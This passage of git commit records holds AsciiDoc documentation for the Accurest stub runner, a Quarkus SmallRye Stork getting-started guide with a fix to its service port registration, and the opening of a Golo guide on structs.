`io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.\n\nIn order to find a URL and port of a given dependency you can autowire the bean in your test and call its methods:\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)\nclass StubRunnerConfigurationSpec extends Specification {\n\n\t@Autowired StubFinder stubFinder\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\tstubFinder.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${stubFinder.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${stubFinder.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n\n\t@Configuration\n\t@Import(StubRunnerConfiguration)\n\t@EnableAutoConfiguration\n\tstatic class Config {}\n}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring Cloud\n\nIf you're using Spring Cloud then it's enough to add `stub-runner-spring-cloud` on classpath and automatically a bean of type `StubFinder` will get registered.\n\n#### Common properties for JUnit and Spring\n\nSome of the properties that are repetitive can be set using system properties or property sources (for Spring). Here are their names with their default values:\n\n[width=\"60%\",frame=\"topbot\",options=\"header\"]\n|======================\n| Property name | Default value | Description |\n|stubrunner.port.range.min|10000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.port.range.max|15000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.stubs.repository.root|| Maven repo url. If blank then will call the local maven repo|\n|stubrunner.stubs.classifier|stubs| Default classifier for the stub artifacts|\n|stubrunner.work-offline|false| If true then will not contact any remote repositories to download stubs|\n|stubrunner.stubs|| Comma separated list of Ivy notation of stubs to download|\n|======================\n\n# 9. Migration Guide\n\n# Migration to 0.4.7\n- in 0.4.7 we've fixed package name (coderate to codearte) so you've to do the same in your projects. This means replacing ```io.coderate.accurest.dsl.GroovyDsl``` with ```io.codearte.accurest.dsl.GroovyDsl```\n\n# Migration to 1.0.0-RC1\n- from 1.0.0 we're distinguish ignored contracts from excluded contracts:\n - `excludedFiles` pattern tells Accurest to skip processing those files at all\n - `ignoredFiles` pattern tells Accurest to generate contracts and tests, but tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - now all DSL files have to be under `contractsDslDir`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - If you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d46d7c25175ea149e524cfdd5321af2c1b2d67d","subject":"Fixed error in Stork guide","message":"Fixed error in Stork guide\n\nSigned-off-by: Helber Belmiro <acae567605c3b6ad01310ceb8780b22694b0e829@gmail.com>\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/stork.adoc","new_file":"docs\/src\/main\/asciidoc\/stork.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Getting Started with SmallRye Stork\n:extension-status: preview\n\ninclude::_attributes.adoc[]\n\nThe essence of distributed systems resides in the interaction between services.\nIn modern architecture, you often have multiple instances of your service to share the load or improve the resilience by redundancy.\nBut how do you select the best instance of your service?\nThat's where https:\/\/smallrye.io\/smallrye-stork[SmallRye Stork] helps.\nStork is going to choose the most appropriate instance.\nIt offers:\n\n* Extensible service discovery mechanisms\n* Built-in support for Consul and Kubernetes\n* Customizable client load-balancing strategies\n\ninclude::{includes}\/extension-status.adoc[]\n\n== Prerequisites\n\n:prerequisites-docker:\ninclude::{includes}\/prerequisites.adoc[]\n\n== Architecture\n\nIn this guide, we will build an application composed of:\n\n* A simple blue service exposed on port 9000\n* A simple red service exposed on port 9001\n* A REST Client calling the blue or red service (the selection is delegated to Stork)\n* A REST endpoint using the REST client and calling the services\n* The blue and red services are registered in https:\/\/www.consul.io\/[Consul].\n\nimage::stork-getting-started-architecture.png[Architecture of the application,width=50%, align=center]\n\nFor the sake of simplicity, everything (except Consul) will be running in the same Quarkus application.\nOf course, each component will run in its own process in the real world.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the applications step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `stork-quickstart` {quickstarts-tree-url}\/stork-quickstart[directory].\n\n== Discovery and selection\n\nBefore going further, we need to discuss discovery vs. selection.\n\n- Service discovery is the process of locating service instances.\nIt produces a list of service instances that is potentially empty (if no service matches the request) or contains multiple service instances.\n\n- Service selection, also called load-balancing, chooses the best instance from the list returned by the discovery process.\nThe result is a single service instance or an exception when no suitable instance can be found.\n\nStork handles both discovery and selection.\nHowever, it does not handle the communication with the service but only provides a service instance.\nThe various integrations in Quarkus extract the location of the service from that service instance.\n\nimage::stork-process.png[Discovery and Selection of services,width=50%, align=center]\n\n== Bootstrapping the project\n\nCreate a Quarkus project importing the quarkus-rest-client-reactive and quarkus-resteasy-reactive extensions using your favorite approach:\n\n:create-app-artifact-id: stork-quickstart\n:create-app-extensions: quarkus-rest-client-reactive,quarkus-resteasy-reactive\ninclude::{includes}\/devtools\/create-app.adoc[]\n\nIn the generated project, also add the following dependencies:\n\n[source,xml,role=\"primary asciidoc-tabs-target-sync-cli asciidoc-tabs-target-sync-maven\"]\n.pom.xml\n----\n<dependency>\n <groupId>io.smallrye.stork<\/groupId>\n <artifactId>stork-service-discovery-consul<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.smallrye.reactive<\/groupId>\n <artifactId>smallrye-mutiny-vertx-consul-client<\/artifactId>\n<\/dependency>\n----\n\n[source,gradle,role=\"secondary asciidoc-tabs-target-sync-gradle\"]\n.build.gradle\n----\nimplementation(\"io.smallrye.stork:stork-service-discovery-consul\")\nimplementation(\"io.smallrye.reactive:smallrye-mutiny-vertx-consul-client\")\n----\n\n`stork-service-discovery-consul` provides an implementation of service discovery for Consul.\n`smallrye-mutiny-vertx-consul-client` is a Consul client which we will use to register our services in Consul.\n\n== The Blue and Red services\n\nLet's start with the very beginning: the service we will discover, select and call.\n\nCreate the `src\/main\/java\/org\/acme\/services\/BlueService.java` with the following content:\n\n[source, java]\n----\npackage org.acme.services;\n\nimport io.quarkus.runtime.StartupEvent;\nimport io.vertx.mutiny.core.Vertx;\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.enterprise.event.Observes;\n\n@ApplicationScoped\npublic class BlueService {\n\n @ConfigProperty(name = \"blue-service-port\", defaultValue = \"9000\") int port;\n\n \/**\n * Start an HTTP server for the blue service.\n *\n * Note: this method is called on a worker thread, and so it is allowed to block.\n *\/\n public void init(@Observes StartupEvent ev, Vertx vertx) {\n vertx.createHttpServer()\n .requestHandler(req -> req.response().endAndForget(\"Hello from Blue!\"))\n .listenAndAwait(port);\n }\n}\n----\n\nIt creates a new HTTP server (using Vert.x) and implements our simple service when the application starts.\nFor each HTTP request, it sends a response with \"Hello from Blue!\" as the body.\n\nFollowing the same logic, create the `src\/main\/java\/org\/acme\/services\/RedService.java` with the following content:\n\n[source, java]\n----\n\npackage org.acme.services;\n\nimport io.quarkus.runtime.StartupEvent;\nimport io.vertx.mutiny.core.Vertx;\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.enterprise.event.Observes;\n\n@ApplicationScoped\npublic class RedService {\n @ConfigProperty(name = \"red-service-port\", defaultValue = \"9001\") int port;\n\n \/**\n * Start an HTTP server for the red service.\n *\n * Note: this method is called on a worker thread, and so it is allowed to block.\n *\/\n public void init(@Observes StartupEvent ev, Vertx vertx) {\n vertx.createHttpServer()\n .requestHandler(req -> req.response().endAndForget(\"Hello from Red!\"))\n .listenAndAwait(port);\n }\n\n}\n----\n\nThis time, it writes \"Hello from Red!\".\n\n== Service registration in Consul\n\nNow that we have implemented our services, we need to register them into Consul.\n\nNOTE: Stork is not limited to Consul and integrates with other service discovery mechanisms.\n\nCreate the `src\/main\/java\/org\/acme\/services\/Registration.java` file with the following content:\n\n[source, java]\n----\npackage org.acme.services;\n\nimport io.quarkus.runtime.StartupEvent;\nimport io.vertx.ext.consul.ServiceOptions;\nimport io.vertx.mutiny.ext.consul.ConsulClient;\nimport io.vertx.ext.consul.ConsulClientOptions;\nimport io.vertx.mutiny.core.Vertx;\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.enterprise.event.Observes;\n\n@ApplicationScoped\npublic class Registration {\n\n @ConfigProperty(name = \"consul.host\") String host;\n @ConfigProperty(name = \"consul.port\") int port;\n\n @ConfigProperty(name = \"red-service-port\", defaultValue = \"9000\") int red;\n @ConfigProperty(name = \"blue-service-port\", defaultValue = \"9001\") int blue;\n\n \/**\n * Register our two services in Consul.\n *\n * Note: this method is called on a worker thread, and so it is allowed to block.\n *\/\n public void init(@Observes StartupEvent ev, Vertx vertx) {\n ConsulClient client = ConsulClient.create(vertx, new ConsulClientOptions().setHost(host).setPort(port));\n\n client.registerServiceAndAwait(\n new ServiceOptions().setPort(red).setAddress(\"localhost\").setName(\"my-service\").setId(\"red\"));\n client.registerServiceAndAwait(\n new ServiceOptions().setPort(blue).setAddress(\"localhost\").setName(\"my-service\").setId(\"blue\"));\n }\n}\n----\n\nWhen the application starts, it connects to Consul using the Vert.x Consul Client and registers our two instances.\nBoth registration uses the same name (`my-service`), but different ids to indicate that it's two instances of the same _service_.\n\n== The REST Client interface and the front end API\n\nSo far, we didn't use Stork; we just scaffolded the services we will be discovering, selecting, and calling.\n\nWe will call the services using the Reactive REST Client.\nCreate the `src\/main\/java\/org\/acme\/MyService.java` file with the following content:\n\n[source, java]\n----\npackage org.acme;\n\nimport org.eclipse.microprofile.rest.client.inject.RegisterRestClient;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n\/**\n * The REST Client interface.\n *\n * Notice the `baseUri`. It uses `stork:\/\/` as URL scheme indicating that the called service uses Stork to locate and\n * select the service instance. The `my-service` part is the service name. This is used to configure Stork discovery\n * and selection in the `application.properties` file.\n *\/\n@RegisterRestClient(baseUri = \"stork:\/\/my-service\")\npublic interface MyService {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n String get();\n}\n----\n\nIt's a straightforward REST client interface containing a single method. However, note the `baseUri` attribute.\nIt starts with `stork:\/\/`.\nIt instructs the REST client to delegate the discovery and selection of the service instances to Stork.\nNotice the `my-service` part in the URL.\nIt is the service name we will be using in the application configuration.\n\nIt does not change how the REST client is used.\nCreate the `src\/main\/java\/org\/acme\/FrontendApi.java` file with the following content:\n\n[source, java]\n----\npackage org.acme;\n\nimport org.eclipse.microprofile.rest.client.inject.RestClient;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n\/**\n * A frontend API using our REST Client (which uses Stork to locate and select the service instance on each call).\n *\/\n@Path(\"\/api\")\npublic class FrontendApi {\n\n @RestClient MyService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String invoke() {\n return service.get();\n }\n\n}\n----\n\nIt injects and uses the REST client as usual.\n\n== Stork Filter\nThe `baseUri` configured in the REST client will be processed by `StorkClientRequestFilter` class, this is a https:\/\/quarkus.io\/specs\/jaxrs\/2.1\/index.html#filters[JAX-RS filter].\nIf you need to process the metadata associated with a message: HTTP headers, query parameters, media type, and other metadata, you can implement another filter to configure what you need.\nLet\u2019s implement a custom filter to add logging capability to our service. We create `CustomLoggingFilter` and annotating it with the @Provider annotation:\n\n[source, java]\n----\npackage org.acme;\n\nimport io.vertx.core.http.HttpServerRequest;\nimport org.jboss.logging.Logger;\nimport org.jboss.resteasy.reactive.client.spi.ResteasyReactiveClientRequestContext;\nimport org.jboss.resteasy.reactive.client.spi.ResteasyReactiveClientRequestFilter;\n\nimport javax.ws.rs.ext.Provider;\n\n@Provider\npublic class CustomLoggingFilter implements ResteasyReactiveClientRequestFilter {\n\n private static final Logger LOG = Logger.getLogger(CustomLoggingFilter.class);\n\n @Override\n public void filter(ResteasyReactiveClientRequestContext requestContext) {\n LOG.infof(\"Resolved address by Stork: %s\",requestContext.getUri().toString());\n }\n}\n----\n\nThe order in which filters are executed is defined by https:\/\/quarkus.io\/specs\/jaxrs\/2.1\/index.html#priorities[Priorities].\nNote that `CustomLoggingFilter` is using a default value, so the user-level priority and the `StorkClientRequestFilter` uses the security authentication filter priority. This means that `StorkClientRequestFilter` will be executed before our `CustomLoggingFilter`.\nUse `@Priority` annotation to change this behaviour.\n\n\n== Stork configuration\n\nThe system is almost complete. We only need to configure Stork and the `Registration` bean.\n\nIn the `src\/main\/resources\/application.properties`, add:\n\n[source, properties]\n----\nconsul.host=localhost\nconsul.port=8500\n\nquarkus.stork.my-service.service-discovery.type=consul\nquarkus.stork.my-service.service-discovery.consul-host=localhost\nquarkus.stork.my-service.service-discovery.consul-port=8500\nquarkus.stork.my-service.load-balancer.type=round-robin\n----\n\nThe first two lines provide the Consul location used by the `Registration` bean.\n\nThe other properties are related to Stork.\n`stork.my-service.service-discovery` indicates which type of service discovery we will be using to locate the `my-service` service.\nIn our case, it's `consul`.\n`quarkus.stork.my-service.service-discovery.consul-host` and `quarkus.stork.my-service.service-discovery.consul-port` configures the access to Consul.\nFinally, `quarkus.stork.my-service.load-balancer.type` configures the service selection.\nIn our case, we use a `round-robin`.\n\n== Running the application\n\nWe're done!\nSo, let's see if it works.\n\nFirst, start Consul:\n\n[source, shell script]\n----\ndocker run --rm --name consul -p 8500:8500 -p 8501:8501 consul:1.7 agent -dev -ui -client=0.0.0.0 -bind=0.0.0.0 --https-port=8501\n----\n\nIf you start Consul differently, do not forget to edit the application configuration.\n\nThen, package the application:\n\ninclude::{includes}\/devtools\/build.adoc[]\n\nAnd run it:\n\n[source, shell script]\n----\n> java -jar target\/quarkus-app\/quarkus-run.jar\n----\n\nIn another terminal, run:\n\n[source, shell script]\n----\n> curl http:\/\/localhost:8080\/api\n...\n> curl http:\/\/localhost:8080\/api\n...\n> curl http:\/\/localhost:8080\/api\n...\n----\n\nThe responses alternate between `Hello from Red!` and `Hello from Blue!`.\n\nYou can compile this application into a native executable:\n\ninclude::{includes}\/devtools\/build-native.adoc[]\n\nAnd start it with:\n\n[source, shell script]\n----\n> .\/target\/stork-getting-started-1.0.0-SNAPSHOT-runner\n----\n\n== Going further\n\nThis guide has shown how to use SmallRye Stork to discover and select your services.\nYou can find more about Stork in:\n\n- the xref:stork-reference.adoc[Stork reference guide],\n- the https:\/\/smallrye.io\/smallrye-stork[SmallRye Stork website].\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Getting Started with SmallRye Stork\n:extension-status: preview\n\ninclude::_attributes.adoc[]\n\nThe essence of distributed systems resides in the interaction between services.\nIn modern architecture, you often have multiple instances of your service to share the load or improve the resilience by redundancy.\nBut how do you select the best instance of your service?\nThat's where https:\/\/smallrye.io\/smallrye-stork[SmallRye Stork] helps.\nStork is going to choose the most appropriate instance.\nIt offers:\n\n* Extensible service discovery mechanisms\n* Built-in support for Consul and Kubernetes\n* Customizable client load-balancing strategies\n\ninclude::{includes}\/extension-status.adoc[]\n\n== Prerequisites\n\n:prerequisites-docker:\ninclude::{includes}\/prerequisites.adoc[]\n\n== Architecture\n\nIn this guide, we will build an application composed of:\n\n* A simple blue service exposed on port 9000\n* A simple red service exposed on port 9001\n* A REST Client calling the blue or red service (the selection is delegated to Stork)\n* A REST endpoint using the REST client and calling the services\n* The blue and red services are registered in https:\/\/www.consul.io\/[Consul].\n\nimage::stork-getting-started-architecture.png[Architecture of the application,width=50%, align=center]\n\nFor the sake of simplicity, everything (except Consul) will be running in the same Quarkus application.\nOf course, each component will run in its own process in the real world.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the applications step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `stork-quickstart` {quickstarts-tree-url}\/stork-quickstart[directory].\n\n== Discovery and selection\n\nBefore going further, we need to discuss discovery vs. selection.\n\n- Service discovery is the process of locating service instances.\nIt produces a list of service instances that is potentially empty (if no service matches the request) or contains multiple service instances.\n\n- Service selection, also called load-balancing, chooses the best instance from the list returned by the discovery process.\nThe result is a single service instance or an exception when no suitable instance can be found.\n\nStork handles both discovery and selection.\nHowever, it does not handle the communication with the service but only provides a service instance.\nThe various integrations in Quarkus extract the location of the service from that service instance.\n\nimage::stork-process.png[Discovery and Selection of services,width=50%, align=center]\n\n== Bootstrapping the project\n\nCreate a Quarkus project importing the quarkus-rest-client-reactive and quarkus-resteasy-reactive extensions using your favorite approach:\n\n:create-app-artifact-id: stork-quickstart\n:create-app-extensions: quarkus-rest-client-reactive,quarkus-resteasy-reactive\ninclude::{includes}\/devtools\/create-app.adoc[]\n\nIn the generated project, also add the following dependencies:\n\n[source,xml,role=\"primary asciidoc-tabs-target-sync-cli asciidoc-tabs-target-sync-maven\"]\n.pom.xml\n----\n<dependency>\n <groupId>io.smallrye.stork<\/groupId>\n <artifactId>stork-service-discovery-consul<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.smallrye.reactive<\/groupId>\n <artifactId>smallrye-mutiny-vertx-consul-client<\/artifactId>\n<\/dependency>\n----\n\n[source,gradle,role=\"secondary asciidoc-tabs-target-sync-gradle\"]\n.build.gradle\n----\nimplementation(\"io.smallrye.stork:stork-service-discovery-consul\")\nimplementation(\"io.smallrye.reactive:smallrye-mutiny-vertx-consul-client\")\n----\n\n`stork-service-discovery-consul` provides an implementation of service discovery for Consul.\n`smallrye-mutiny-vertx-consul-client` is a Consul client which we will use to register our services in Consul.\n\n== The Blue and Red services\n\nLet's start with the very beginning: the service we will discover, select and call.\n\nCreate the `src\/main\/java\/org\/acme\/services\/BlueService.java` with the following content:\n\n[source, java]\n----\npackage org.acme.services;\n\nimport io.quarkus.runtime.StartupEvent;\nimport io.vertx.mutiny.core.Vertx;\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.enterprise.event.Observes;\n\n@ApplicationScoped\npublic class BlueService {\n\n @ConfigProperty(name = \"blue-service-port\", defaultValue = \"9000\") int port;\n\n \/**\n * Start an HTTP server for the blue service.\n *\n * Note: this method is called on a worker thread, and so it is allowed to block.\n *\/\n public void init(@Observes StartupEvent ev, Vertx vertx) {\n vertx.createHttpServer()\n .requestHandler(req -> req.response().endAndForget(\"Hello from Blue!\"))\n .listenAndAwait(port);\n }\n}\n----\n\nIt creates a new HTTP server (using Vert.x) and implements our simple service when the application starts.\nFor each HTTP request, it sends a response with \"Hello from Blue!\" as the body.\n\nFollowing the same logic, create the `src\/main\/java\/org\/acme\/services\/RedService.java` with the following content:\n\n[source, java]\n----\n\npackage org.acme.services;\n\nimport io.quarkus.runtime.StartupEvent;\nimport io.vertx.mutiny.core.Vertx;\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.enterprise.event.Observes;\n\n@ApplicationScoped\npublic class RedService {\n @ConfigProperty(name = \"red-service-port\", defaultValue = \"9001\") int port;\n\n \/**\n * Start an HTTP server for the red service.\n *\n * Note: this method is called on a worker thread, and so it is allowed to block.\n *\/\n public void init(@Observes StartupEvent ev, Vertx vertx) {\n vertx.createHttpServer()\n .requestHandler(req -> req.response().endAndForget(\"Hello from Red!\"))\n .listenAndAwait(port);\n }\n\n}\n----\n\nThis time, it writes \"Hello from Red!\".\n\n== Service registration in Consul\n\nNow that we have implemented our services, we need to register them into Consul.\n\nNOTE: Stork is not limited to Consul and integrates with other service discovery mechanisms.\n\nCreate the `src\/main\/java\/org\/acme\/services\/Registration.java` file with the following content:\n\n[source, java]\n----\npackage org.acme.services;\n\nimport io.quarkus.runtime.StartupEvent;\nimport io.vertx.ext.consul.ServiceOptions;\nimport io.vertx.mutiny.ext.consul.ConsulClient;\nimport io.vertx.ext.consul.ConsulClientOptions;\nimport io.vertx.mutiny.core.Vertx;\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\n\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.enterprise.event.Observes;\n\n@ApplicationScoped\npublic class Registration {\n\n @ConfigProperty(name = \"consul.host\") String host;\n @ConfigProperty(name = \"consul.port\") int port;\n\n @ConfigProperty(name = \"blue-service-port\", defaultValue = \"9000\") int red;\n @ConfigProperty(name = \"red-service-port\", defaultValue = \"9001\") int blue;\n\n \/**\n * Register our two services in Consul.\n *\n * Note: this method is called on a worker thread, and so it is allowed to block.\n *\/\n public void init(@Observes StartupEvent ev, Vertx vertx) {\n ConsulClient client = ConsulClient.create(vertx, new ConsulClientOptions().setHost(host).setPort(port));\n\n client.registerServiceAndAwait(\n new ServiceOptions().setPort(blue).setAddress(\"localhost\").setName(\"my-service\").setId(\"blue\"));\n client.registerServiceAndAwait(\n new ServiceOptions().setPort(red).setAddress(\"localhost\").setName(\"my-service\").setId(\"red\"));\n\n }\n}\n----\n\nWhen the application starts, it connects to Consul using the Vert.x Consul Client and registers our two instances.\nBoth registration uses the same name (`my-service`), but different ids to indicate that it's two instances of the same _service_.\n\n== The REST Client interface and the front end API\n\nSo far, we didn't use Stork; we just scaffolded the services we will be discovering, selecting, and calling.\n\nWe will call the services using the Reactive REST Client.\nCreate the `src\/main\/java\/org\/acme\/MyService.java` file with the following content:\n\n[source, java]\n----\npackage org.acme;\n\nimport org.eclipse.microprofile.rest.client.inject.RegisterRestClient;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n\/**\n * The REST Client interface.\n *\n * Notice the `baseUri`. It uses `stork:\/\/` as URL scheme indicating that the called service uses Stork to locate and\n * select the service instance. The `my-service` part is the service name. This is used to configure Stork discovery\n * and selection in the `application.properties` file.\n *\/\n@RegisterRestClient(baseUri = \"stork:\/\/my-service\")\npublic interface MyService {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n String get();\n}\n----\n\nIt's a straightforward REST client interface containing a single method. However, note the `baseUri` attribute.\nIt starts with `stork:\/\/`.\nIt instructs the REST client to delegate the discovery and selection of the service instances to Stork.\nNotice the `my-service` part in the URL.\nIt is the service name we will be using in the application configuration.\n\nIt does not change how the REST client is used.\nCreate the `src\/main\/java\/org\/acme\/FrontendApi.java` file with the following content:\n\n[source, java]\n----\npackage org.acme;\n\nimport org.eclipse.microprofile.rest.client.inject.RestClient;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n\/**\n * A frontend API using our REST Client (which uses Stork to locate and select the service instance on each call).\n *\/\n@Path(\"\/api\")\npublic class FrontendApi {\n\n @RestClient MyService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String invoke() {\n return service.get();\n }\n\n}\n----\n\nIt injects and uses the REST client as usual.\n\n== Stork Filter\nThe `baseUri` configured in the REST client will be processed by `StorkClientRequestFilter` class, this is a https:\/\/quarkus.io\/specs\/jaxrs\/2.1\/index.html#filters[JAX-RS filter].\nIf you need to process the metadata associated with a message: HTTP headers, query parameters, media type, and other metadata, you can implement another filter to configure what you need.\nLet\u2019s implement a custom filter to add logging capability to our service. We create `CustomLoggingFilter` and annotating it with the @Provider annotation:\n\n[source, java]\n----\npackage org.acme;\n\nimport io.vertx.core.http.HttpServerRequest;\nimport org.jboss.logging.Logger;\nimport org.jboss.resteasy.reactive.client.spi.ResteasyReactiveClientRequestContext;\nimport org.jboss.resteasy.reactive.client.spi.ResteasyReactiveClientRequestFilter;\n\nimport javax.ws.rs.ext.Provider;\n\n@Provider\npublic class CustomLoggingFilter implements ResteasyReactiveClientRequestFilter {\n\n private static final Logger LOG = Logger.getLogger(CustomLoggingFilter.class);\n\n @Override\n public void filter(ResteasyReactiveClientRequestContext requestContext) {\n LOG.infof(\"Resolved address by Stork: %s\",requestContext.getUri().toString());\n }\n}\n----\n\nThe order in which filters are executed is defined by https:\/\/quarkus.io\/specs\/jaxrs\/2.1\/index.html#priorities[Priorities].\nNote that `CustomLoggingFilter` is using a default value, so the user-level priority and the `StorkClientRequestFilter` uses the security authentication filter priority. This means that `StorkClientRequestFilter` will be executed before our `CustomLoggingFilter`.\nUse `@Priority` annotation to change this behaviour.\n\n\n== Stork configuration\n\nThe system is almost complete. We only need to configure Stork and the `Registration` bean.\n\nIn the `src\/main\/resources\/application.properties`, add:\n\n[source, properties]\n----\nconsul.host=localhost\nconsul.port=8500\n\nquarkus.stork.my-service.service-discovery.type=consul\nquarkus.stork.my-service.service-discovery.consul-host=localhost\nquarkus.stork.my-service.service-discovery.consul-port=8500\nquarkus.stork.my-service.load-balancer.type=round-robin\n----\n\nThe first two lines provide the Consul location used by the `Registration` bean.\n\nThe other properties are related to Stork.\n`stork.my-service.service-discovery` indicates which type of service discovery we will be using to locate the `my-service` service.\nIn our case, it's `consul`.\n`quarkus.stork.my-service.service-discovery.consul-host` and `quarkus.stork.my-service.service-discovery.consul-port` configures the access to Consul.\nFinally, `quarkus.stork.my-service.load-balancer.type` configures the service selection.\nIn our case, we use a `round-robin`.\n\n== Running the application\n\nWe're done!\nSo, let's see if it works.\n\nFirst, start Consul:\n\n[source, shell script]\n----\ndocker run --rm --name consul -p 8500:8500 -p 8501:8501 consul:1.7 agent -dev -ui -client=0.0.0.0 -bind=0.0.0.0 --https-port=8501\n----\n\nIf you start Consul differently, do not forget to edit the application configuration.\n\nThen, package the application:\n\ninclude::{includes}\/devtools\/build.adoc[]\n\nAnd run it:\n\n[source, shell script]\n----\n> java -jar target\/quarkus-app\/quarkus-run.jar\n----\n\nIn another terminal, run:\n\n[source, shell script]\n----\n> curl http:\/\/localhost:8080\/api\n...\n> curl http:\/\/localhost:8080\/api\n...\n> curl http:\/\/localhost:8080\/api\n...\n----\n\nThe responses alternate between `Hello from Red!` and `Hello from Blue!`.\n\nYou can compile this application into a native executable:\n\ninclude::{includes}\/devtools\/build-native.adoc[]\n\nAnd start it with:\n\n[source, shell script]\n----\n> .\/target\/stork-getting-started-1.0.0-SNAPSHOT-runner\n----\n\n== Going further\n\nThis guide has shown how to use SmallRye Stork to discover and select your services.\nYou can find more about Stork in:\n\n- the xref:stork-reference.adoc[Stork reference guide],\n- the https:\/\/smallrye.io\/smallrye-stork[SmallRye Stork website].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4be3e61bc0e80a641987c9df9adebe8b4cadff3","subject":"Documentation for private struct members","message":"Documentation for private struct members\n","repos":"dynamid\/golo-lang-insa-citilab-historical-reference,dynamid\/golo-lang-insa-citilab-historical-reference,titimoby\/golo-lang,titimoby\/golo-lang,smarr\/golo-lang,smarr\/golo-lang,dynamid\/golo-lang-insa-citilab-historical-reference","old_file":"doc\/structs.asciidoc","new_file":"doc\/structs.asciidoc","new_contents":"== Structs ==\n\nGolo allows the definition of simple structures using the `struct` keyword. They resemble structures\nin procedural languages such as C `struct` or Pascal *records*. They are useful to store data when\nthe set of named entries is fixed.\n\n=== Definition ===\n\nStructures are defined at the module-level:\n\n----\nmodule sample\n\nstruct Person = { name, age, email }\n\nfunction main = |args| {\n let p1 = Person(\"Mr Bean\", 54, \"bean@gmail.com\")\n println(p1: name())\n let p2 = Person(): name(\"John\"): age(32): email(\"john@b-root.com\")\n println(p2: age())\n}\n----\n\nWhen declaring a structure, it also defines two factory functions: one with no arguments, and one\nwith all arguments in their order of declaration in the `struct` statement. When not initialized,\nmember values are `null`.\n\nEach member yields a *getter* and a *setter* method: given a member `a`, the getter is method `a()`\nwhile the setter is method `a(newValue)`. It should be noted that setter methods return the\nstructure instance which makes it possible to chain calls as illustrated in the previous example\nwhile building `p2`.\n\n=== JVM existence ===\n\nEach `struct` is compiled to a self-contained JVM class.\n\nGiven:\n\n----\nmodule sample\n\nstruct Point = { x, y }\n----\n\na class `sample.types.Point` is being generated.\n\nIt is important to note that:\n\n1. each `struct` class is `final`,\n2. each `struct` class inherits from `gololang.GoloStruct`,\n3. proper definitions of `toString()`, `hashCode()` and `equals()` are being provided.\n\n=== `toString()` behavior ===\n\nThe `toString()` method is being overridden to provide a meaningful description of a 